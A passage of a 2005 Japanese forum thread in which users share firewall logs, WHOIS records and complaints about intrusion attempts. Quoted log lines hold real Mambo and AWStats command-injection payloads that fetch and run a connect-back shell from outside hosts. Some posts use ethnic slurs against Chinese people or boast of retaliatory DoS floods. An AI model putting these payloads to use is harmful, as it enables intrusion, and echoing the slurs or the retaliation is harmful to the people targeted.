218.5.18.93 チャンコロむかつく
221 :
名無しさん@お腹いっぱい。 :2005/12/11(日) 18:57:17
>>220 俺もそいつから今攻撃された
昨日から中国の攻撃がすごい多い
222 :
名無しさん@お腹いっぱい。 :2005/12/11(日) 19:21:51
2005/12/11(14:56:56) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /thisdoesnotexistahaha.php HTTP/1.1" ( dummy ) 2005/12/11(14:56:57) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:56:58) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /file/trunk/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:56:58) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /log/trunk/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:56:59) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /trunk/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:56:59) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /wordpress/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:57:00) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:57:01) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /drupal/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:57:01) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlrpc/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:57:02) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:57:02) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /blog/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:57:03) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /community/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/11(14:57:04) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /blogs/xmlrpc.php HTTP/1.1" ( dummy ) (中略) 2005/12/11(14:57:11) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /pavon/xmlrpc.php HTTP/1.1" ( dummy )
中国何回攻撃してくるんだ
inetnum: 218.64.0.0 - 218.65.127.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
changed:
[email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
status: ALLOCATED NON-PORTABLE
source: APNIC
inetnum: 218.64.0.0 - 218.95.255.255
netname: CHINANET-CN
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: CH93-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET
changed:
[email protected] 20010628
status: ALLOCATED PORTABLE
source: APNIC
氏ね
inetnum: 218.87.0.0 - 218.87.255.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
status: ALLOCATED NON-PORTABLE
changed:
[email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
source: APNIC
inetnum: 211.90.0.0 - 211.97.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: UCH1-AP
tech-c: UCH1-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CN-CNNIC-UNICOM
status: ALLOCATED PORTABLE
changed:
[email protected] 20041203
source: APNIC
inetnum: 211.94.0.0 - 211.103.255.255
netname: CNNIC
descr: China Internet Network Information Center
country: CN
admin-c: HQ1-CN
tech-c: MW1-AP
tech-c: WZ2-AP
remarks: confederation CNNIC
mnt-by: MAINT-CNNIC-AP
changed:
[email protected] 19991214
status: ALLOCATED PORTABLE
source: APNIC
22102 へのアクセスがハゲシス
中国だから警察にいっても捕まらないんだよな
22時40分に 218.87.160.151(まあ支那だけど・・・) からの攻撃をブロックしたって表示が出てるんだけど、 ブロックされれば安全ってこと?
230 :
名無しさん@お腹いっぱい。 :2005/12/12(月) 00:06:09
IPアドレス 211.155.224.254 ホスト名 mail2.srt.com.cn IPアドレス 割当国 ※ 中国 (CN) 昨日から攻撃すごいんですけど どうにかなりませんか?
231 :
名無しさん@お腹いっぱい。 :2005/12/12(月) 01:09:59
221.138.69.58から来るんだけど・・・。 一応韓国で住所までわかるんだが・・・。
夜に中国からの攻撃が20回ほどあったんだがなんでいままであんまり攻撃してこなかったのに急にたくさん 攻撃してくるんだろ
昨日の夜に1026使ってインドネシアから攻撃が来たな 珍しい?
133.205.161.195 ホスト名 FLH1Aan195.chb.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 千葉県 市外局番 -- 接続回線 光 さっきから何度も何度も連続で攻撃してきやがって。うぜぇ氏ね
>>229 ブロックしてないのにブロックしたよって言っていなければ安全
237 :
名無しさん@お腹いっぱい。 :2005/12/13(火) 02:37:21
不正アクセスされるとどうなるの
238 :
名無しさん@お腹いっぱい。 :2005/12/13(火) 04:07:27
ウゼー www.mutoh.co.jp 武藤工業って会社が中国の中継 仕事の調べモノできねーじゃん
2005/12/13(02:42:47) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy ) 2005/12/13(02:42:49) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy ) 2005/12/13(02:42:50) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy ) 2005/12/13(02:42:51) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy ) 2005/12/13(02:42:52) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(02:42:54) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /drupal/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(02:42:55) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(02:42:56) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /wordpress/xmlrpc.php HTTP/1.1" ( dummy ) 途中で改行してあるがこれはひどい。
>>209 1025ポートはApplication Layer Gateway Serviceだと思うんだけど、
過去にセキュリティホールなんてあったっけ?
ファイルバージョン:5.1.2600.2180
242 :
1/2 :2005/12/13(火) 15:15:02
2005/12/13(15:09:34) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod %20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy ) 2005/12/13(15:09:36) W-SV ftp1.nickonline.com(166.77.41.116) [80] 302 29 "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod %20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy ) 2005/12/13(15:09:37) W-SV ftp1.nickonline.com(166.77.41.116) [80] 302 29 "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod %20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(15:09:38) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:39) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blog/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:40) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:41) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:43) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /drupal/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:44) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:45) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /wordpress/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:46) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:47) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc/xmlrpc.php HTTP/1.1" ( dummy ) 2005/12/13(15:09:48) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )
httpサーバーからセットでアクセスされているおまえ ウザいから書き込むな!
245 :
名無しさん@お腹いっぱい。 :2005/12/13(火) 20:22:07
あなたが検索されたアドレス[ 221.188.211.53 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 221.188.0.0/16 b. [ネットワーク名] OCN f. [組織名] オープンコンピュータネットワーク g. [Organization] Open Computer Network m. [管理者連絡窓口] AY1361JP n. [技術連絡担当者] MO081JP n. [技術連絡担当者] KK551JP n. [技術連絡担当者] IM657JP p. [ネームサーバ] ns-kg001.ocn.ad.jp p. [ネームサーバ] ns-kn001.ocn.ad.jp [割当年月日] 2003/08/27 [最終更新] 2003/08/27 12:52:01(JST) 上位情報 ---------- エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION) [割り振り] 221.184.0.0/13
昨日は中国からアクセスすごかったのに今日はなんで少なくなったんだ
さっきルータ繋ぎなおしてあるIPになったとたん、複数の色んなとこから ポート 61880 17020 にどーーーーーーーーーーーーーーーーーーーーーっと いっせいにアクセスされたんだけどこれって何ナノ?(;・∀・)
>>244 WinでBJD使ってる素人だから無理だろ
249 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 00:02:46
>>245 みたいな結果って
OCNのプロバイダ利用している動的IPのPCからって事ですか?
俺ゃ、ファイアーウォールの不正アクセスログなど一切気にしません。 ふざけたやつを見つけた時だけ一時間はDOS攻撃をしてやります。
251 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 00:22:37
61.14.156.68 とにかくシツコイが罠を仕掛けるとぱったりw
252 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 00:26:43
61.14.156.70 またきたwwwwなにこれwwww
253 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 00:34:50
% [whois.apnic.net node-1]
% Whois data copyright terms
http://www.apnic.net/db/dbcopyright.html inetnum: 61.14.128.0 - 61.14.191.255
netname: ANC-NETBLK04
descr: Asia Netcom Corporation
descr: Internet Service Provider
country: AP
admin-c: AN155-AP
tech-c: AN155-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-AP-ANC
e-mail:
[email protected] -------------------------------------------------------------------------------
訳ワカラン
254 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 01:47:19
61.14.156.69 ここヤバイの???
255 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 02:59:59
220.248.201.2 219.154.96.7 中国(CN) ポート1025を攻めてきやがった。 別件で135攻められてるのってブラスタ?
256 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 03:02:55
220.148.188.60 掲示板へSPAM書き込み連打。 ぐぐるとわかるけど他の掲示板も被害にあってるっぽい。 どうでもいいけど、SMTPとPOP3が開いてますよ^^
すごいのきた。こっちは開いてるように見せかけてるサーバだから大丈夫だけどね。 sshd: Authentication Failures: unknown (jinzai.yqa.co.jp): 2928 Time(s) bin (jinzai.yqa.co.jp): 1 Time(s) Invalid Users: Unknown Account: 2928 Time(s)
>>257 これ、PROXで運営されている(おそらく専用)サーバなんだが、
PROXのは管理がいい加減なサーバが多いね。
rootもらってるはずだから利用者側にも問題あるし、
そもそも穴だらけと思われるデフォルト設定をしているPROXもどうかと。
以下、一部抜粋。
$ dig jinzai.yqa.co.jp
;; ANSWER SECTION:
jinzai.yqa.co.jp. 85543 IN A 210.143.109.198
$ dig -x 210.143.109.198
;; ANSWER SECTION:
198.109.143.210.in-addr.arpa. 85955 IN PTR jinzai.yqa.co.jp.
;; AUTHORITY SECTION:
109.143.210.in-addr.arpa. 70772 IN NS dns1.ixent.ne.jp.
109.143.210.in-addr.arpa. 70772 IN NS dns2.ixent.ne.jp.
穴だらけならば落っこどしてやればいいじゃない
攻撃? そんなのウンコだ
206.223.151.67
81.21.214.70.117 トルコから さっきはシナチクだった
[09:29:50] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - - [09:29:51] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - - [09:29:52] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - - [09:29:53] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - - [09:29:54] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - - [09:29:55] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - - [09:29:56] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - - [09:29:57] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - - ようやく我が家にもそれらしきものが来たかと思ったが台湾だった…。
264 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 18:35:13
厨のIP 220.220.235.175 61.199.8.217
265 :
名無しさん@お腹いっぱい。 :2005/12/14(水) 23:37:43
nthygo086018.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.212.18)
[19:16:21] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:22] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:24] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:27] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:28] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:30] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:31] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:32] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:33] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:37] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:38] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:39] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - [19:16:40] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - - 珍しいお客さんだな オーストラリアか
267 :
名無しさん@お腹いっぱい。 :2005/12/15(木) 22:16:59
誰かお力ある方助けてください!うちのHPやリンク先にまでそいつに荒らされたのでご協力ください。 221.188.193.160 p6160-ipad03takkise.saga.ocn.ne.jp よろしくお願いします!!
[19:30:19] <61.1.156.88> (0,0) [異常なヘッダーを受信しました] - - インド
269 :
名無しさん@お腹いっぱい。 :2005/12/16(金) 10:08:36
ntfksm049078.fksm.nt.adsl.ppp.infoweb.ne.jp=222.159.90.78
270 :
名無しさん@お腹いっぱい。 :2005/12/16(金) 16:37:29
www.gooddrv.pe.kr 211.184.241.251
271 :
名無しさん@お腹いっぱい。 :2005/12/16(金) 17:39:58
CHAINANET-CN 219.146.161.10 おい!チャンコロ!!いい加減にせいよ! 一日中チャンコロだらけだ!
272 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 00:38:22
218.18.38.35 213.201.218.211 xydranet.de=85.214.28.58
273 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 02:31:59
221.117.59.156 AU
中国からここ毎日攻撃されます。おかしいんじゃないか?ってくらいもの凄いしつこいです。 最近じゃIP追跡しても判定不能って結果返ってきますが皆さんはどうですか?
275 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 08:32:52
今日の6:19頃、いろんなとこからsmtpポートへのアタックがあったんですがうちだけですかね? 全部、helo=<WindowsServer2003WebEdition> になってる。
CNからTCP PORT 21857禿げしくうぜー
>>274 ほんとしつこい、帯域食われてまともにHPすら見れなくなる
しばらくモデムの電源OFFすれば消えるけど、めんどくさい
277 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 14:15:24
シナ畜221.38.148.30
278 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 14:33:57
202.201.229.21 221.237.160.164 151.11.45.70 219-80-229-125.static.tfn.net.tw=219.80.229.125
279 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 14:59:12
202.229.166.4
280 :
超こわい :2005/12/17(土) 16:55:58
このごろよく出会い系っぽいところから頻繁にメールが届くのですが
これは不正アクセスでメールアドレス盗まれたのでしょうか?
info@のメールがすごい毎時間ごとにきますw、記載されているHPみにいっても
同じやつがつくってるっぽいのです、こんなメールです。
お金に余裕のある女性メンバー中心で運営している
当サイトでは只今新しい逆○イベントを開催しております!
★あなたは上村 希絵(社長)【ID:142588】と愛人契約(最低保証金有り〜)を結びませんか?OKであれば登録際に
名前の後に上村(社長)のID:【142588】をつけたください!
http://www.chabby-funk.com/?share 他の金持ち女性からも逆指名を受けるチャンスがあります。
12月25日 16時を過ぎると破棄とみなします。
サイト料金は一切なし!安心してご利用ください。
http://www.chabby-funk.com/?share 拒否:
[email protected] 拒否しても新しいサイトからinfo@でメールが届きます、どうすれば
救われるでしょうか。
281 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 18:00:49
拒否なんてしたら藻前んとこにスパムが届いてるって、わざわざ教えにいってる様なもんだよw
282 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 18:03:47
>>276 ポート開けとくからだよ。
(refuseするように)閉めておけば、同じところからは1回しかこない。
283 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 21:06:32
>> 280 ” Spam Mail Killer ”っつうソフトを導入して、"info@"を総蹴りにしてみそ。
61.234.250.25 中国から。氏ね。
205.209.143.90 アメーウィカから
このコンピュータに対する侵入 「MS MSDTC UserAllocate BO」 の試みを 検出して遮断しました。 61.234.250.25 =218.22.154.131 さっきからシツコイ 氏ね
>>282 それどうやってやるの?やり方わからん。
IPアドレス 203.141.42.10 ホスト名 imgg01.img.vip.bbt.yahoo.co.jp IPアドレス割当国 ※ 日本 (JP) TCP SYN FLOOD
289 :
名無しさん@お腹いっぱい。 :2005/12/17(土) 23:53:47
lb.acconnect.com(199.234.90.39) xd182.internetdsl.tpnet.pl(80.55.211.182) 80.50.64.94 86.120.221.177 85-10-201-228.clients.your-server.de(85.10.201.228)
6回 IPアドレス 88.72.32.183 ホスト名 dslb-088-072-032-183.pools.arcor-ip.net IPアドレス割当国 ※ ドイツ (DE) 5回 IPアドレス 61.129.32.87 ホスト名 対応するホスト名がありません IPアドレス割当国 ※ 中国 (CN) 5回 IPアドレス 219.139.32.243 ホスト名 対応するホスト名がありません IPアドレス割当国 ※ 中国 (CN) 4回 IPアドレス 203.179.17.151 ホスト名 www.jbook.co.jp IPアドレス割当国 ※ 日本 (JP) まとめて氏ね
218.16.120.253中国 (CN) 221.214.140.165中国 (CN) 219.144.234.38中国 (CN) 支那竹は踏み台にされまくりか? 国単位でセキュリティ強化するまでwwwから切り離せよ あんな国
>>291 外国からの情報を規制するのに手一杯でセキュリティ強化までする余裕がありません(><)
Yahoo!やgoogleや各ISPに圧力をかけるだけで精一杯です。
中国がネット上で迷惑をかけている情報も遮断しているので、各ユーザーが気を付ける事もありませんのであしからず。
要するに自国の利便性”のみ”を追求してる以上それに応じた対応しかしないということやね。
中国はwwwから切り離せ
295 :
名無しさん@お腹いっぱい。 :2005/12/18(日) 07:16:24
欧州からのお客さん 217.8.138.29 ノルウェー 195.28.196.79 フランス 不正アクセスのほとんどはアジアからなんだが珍しいな
>>287 Windowsパソコン?
ファイアウォールで必要なポートのみ開けるのがまず第一歩だけど、
ハードウェアのルータを導入するのが簡単。
Windows自体がパーソナルファイアウォール機能ってのも持ってるようだけど、
どの程度のことができるのかはよく知らんので、調べてみそ。
サーバーとか立ててる場合には、さらにサーバー上での設定をいろいろ行う。
今日は中国から来ないよ。珍しい・・。 昨日まではPC起動したらすぐ攻撃してきたのにさ。皆はどうよ。
298 :
287 :2005/12/19(月) 05:09:46
>>296 winでルータ入れてて、フィルタリングもしてるけど
もしかして、設定間違えてるかも・・・
早々見直してみます、ありがとです。
>>298 IPマスカレード(最近だとNAPTっていう方が多いかな)なら、
大抵はそのまんまでシャットアウトできると思うんだけど、
もしかしたらルータによってはデフォルト設定などが不十分なこともあるかな?
あと、ゲームとかで穴を開けてるなら、その開け方にも注意が必要よん。
300 :
名無しさん@お腹いっぱい。 :2005/12/19(月) 10:48:17
nthygo091098.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.227.98) pcp06964878pcs.nftmyr01.fl.comcast.net(69.139.59.204) www.teupen-lift.com(195.35.109.65) 137.118.28.226
301 :
名無しさん@お腹いっぱい。 :2005/12/19(月) 10:50:24
61.66.208.20 台湾
221.8.166.138 中国
303 :
名無しさん@お腹いっぱい。 :2005/12/19(月) 12:02:32
h81172135100.kund.kommunicera.umea.se(81.172.135.100)
304 :
名無しさん@お腹いっぱい。 :2005/12/19(月) 22:06:15
あなたが検索されたアドレス[ 211.14.234.152 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.14.232.0/21 b. [ネットワーク名] KATCH-NET f. [組織名] 株式会社キャッチネットワーク g. [Organization] KATCH Network Inc. m. [管理者連絡窓口] NK2872JP n. [技術連絡担当者] NK2872JP n. [技術連絡担当者] MO6056JP p. [ネームサーバ] ns.katch.ne.jp p. [ネームサーバ] ns2.katch.ne.jp [割当年月日] 2005/05/09 [最終更新] 2005/05/09 22:53:08(JST) 上位情報 ---------- 株式会社キャッチネットワーク (KATCH Network Inc.) [割り振り] 211.14.232.0/21
305 :
名無しさん@お腹いっぱい。 :2005/12/19(月) 22:32:52
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 203.136.219.0/24 b. [ネットワーク名] BIGLOBE-7M f. [組織名] BIGLOBEサービス(日本電気株式会社) g. [Organization] NEC Corporation m. [管理者連絡窓口] NK032JP n. [技術連絡担当者] MK11728JP p. [ネームサーバ] ns02.mesh.ad.jp p. [ネームサーバ] ns03.mesh.ad.jp [割当年月日] 2003/07/24 [返却年月日] [最終更新] 2004/04/12 17:47:01(JST) 上位情報 ---------- 日本電気株式会社 (NEC Corporation) [割り振り] 203.136.128.0/17 しつこい。。
306 :
名無しさん@お腹いっぱい。 :2005/12/20(火) 00:43:37
IPアドレス 220.150.150.49 日本時間0時32分 連続26回のアクセス
307 :
名無しさん@お腹いっぱい。 :2005/12/20(火) 00:51:59
inetnum: 220.150.0.0 - 220.150.255.255
netname: FBDC
descr: FreeBit Co.,Ltd.
descr: 13F E.Space Tower 3-6 Maruyama-cho,
descr: Shibuya-ku,Tokyo,Japan
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
status: ALLOCATED PORTABLE
remarks: Email address for spam or abuse complaints :
[email protected] mnt-by: MAINT-JPNIC
mnt-lower: MAINT-JPNIC
changed:
[email protected] 20040122
source: APNIC
>>306 俺なんて不正アクセスに腹が立ったら1万回はパケット送信してやるがなw
220.133.92.35 台湾 218.42.119.137 日本 194.199.43.59 フランス 68.236.161.197 ??? 鬱陶しいにゃー
311 :
名無しさん@お腹いっぱい。 :2005/12/20(火) 23:36:41
IPアドレス 220.150.150.49 ブロック時間 日本時間23時20分 この人昨日も凄かったけど今日も30回ほどアクセスあり どこの誰?何も情報もってませんよ〜
IP219.112.79.229 Node229.79.112.219.ap.yourne ノートン先生で追っかけたけど、サーバが応答しなかった どこだよこいつ
>>312 229.79.112.219.ap.yournet.ne.jp
yournet.ne.jpってのは多くのISPに接続ポイントのインフラを提供している会社のひとつ。
だから一般人の感染したパソコンでしょ。
314 :
312 :2005/12/21(水) 22:09:34
315 :
名無しさん@お腹いっぱい。 :2005/12/22(木) 08:12:24
218.219.144.126 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 218.219.144.0/24 b. [ネットワーク名] EDITNET うざす f. [組織名] EditNet 株式会社 g. [Organization] EditNet, Inc. m. [管理者連絡窓口] JP00000379 n. [技術連絡担当者] JP00000379 p. [ネームサーバ] korosuke.edit.ne.jp p. [ネームサーバ] ns.edit.ne.jp p. [ネームサーバ] ns1.edit.ne.jp p. [ネームサーバ] ns2.edit.ne.jp [割当年月日] 2002/01/25 [返却年月日] [最終更新] 2005/06/20 23:49:12(JST)
195.178.133.101 ウクライナ(゚ω゚=)
25番ポートに複数の国から来ているけど、何の祭りだ?
219.141.46.39から1200〜1400あたりを延々とポートスキャン
person: dan lu
nic-hdl: DL72-AP
e-mail:
[email protected] address: 3. east yanan road of guiyang
address: 550001 china
phone: +86-851-6861469
fax-no: +86-851-6857020
country: CN
changed:
[email protected] 20030122
mnt-by: MAINT-CHINANET-GUIZHOU
source: APNIC
210.158.41.21 (speakeasy2.speakeasy.co.jp) から100回以上のSSHアタック。 この会社のメインのウェブサーバー www.speakeasy.co.jp は繋がらないみたいだから、 クラックされて落ちてるか、クラックに気づいて切り離していると思われ。
気付いて切り離して放置してたら悪質だな(;′д`)
324 :
名無しさん@お腹いっぱい。 :2005/12/23(金) 14:30:00
www.speakeasy.co.jp て常連さんだよw
219.240.39.130 81.82.221.38 203.162.6.66 207.161.40.164 Uzeeeeeeeeeeeeeeeeeeeeeeeeeeeee!!
>>324 そうなんだ...でもgoogle掛からないね。それっぽい話。
世界平和とは対抗しないこと。 ネットワークではファイアウォールがあるから攻撃されるのです。 防衛は戦争なのです。 大津市のように 『無防備宣言』 をすべきです。 すべてのポートを開いて誰でも自由にアクセスできるようにする。 この心掛けが重要なのです。 これが世界平和へと通じるのです。 さあ、 みなさんもファイアウォールを無効にして ルーターも取り払いましょう。 世界平和のために。
Microsoft Updateやapt-getもやめましょう
329 :
名無しさん@お腹いっぱい。 :2005/12/23(金) 18:16:26
61.116.196.143 アメリカはキャリフォルニアからいらっしゃーい まあ、お茶でも飲もうよ?
330 :
名無しさん@お腹いっぱい。 :2005/12/23(金) 18:19:10
BD NetBus Pro2.0って何よ?
331 :
名無しさん@お腹いっぱい。 :2005/12/23(金) 18:48:47
>>330 TCP12345-12346突いてくるトロイの木馬だよ
332 :
名無しさん@お腹いっぱい。 :2005/12/23(金) 19:26:05
うおっ、すげー勉強しちゃったぜ。
糞が進入してきたら ゴミのIPを基地外シナ反日サイトに晒しちゃってるけど 問題ないよね
61.14.184.242 すごい勢いでログが埋まってる
なんかsshアタックはなれたなw 去年の夏から急増して、今じゃ年中行事。一応国内の奴だけはISPに 警告のメールを送っておくけどね。某社なんぞ反応全くなし。自分とこ のユーザーが犯罪してるんだけどな・・・。
先週は中国から猛烈に攻撃されたがここ最近はパッタリと止んだ。 あーすっきり。
>>335 慣れるというか、対策をちゃんとやってれば心配には及ばないけど、
企業なんかは電話するか、レンサバ運用ならそっちに連絡した方が「いとおかし」だよ。
企業の対応が興味深いし、中堅以上のサーバー会社なら間違いなくサーバーを止める。
企業はそこから慌てふためく。
209.219.89.130 68.90.168.82 疑わしきは罰する(晒す)
時が・・・止まった・・・
341 :
名無しさん@お腹いっぱい。 :2005/12/25(日) 09:17:46
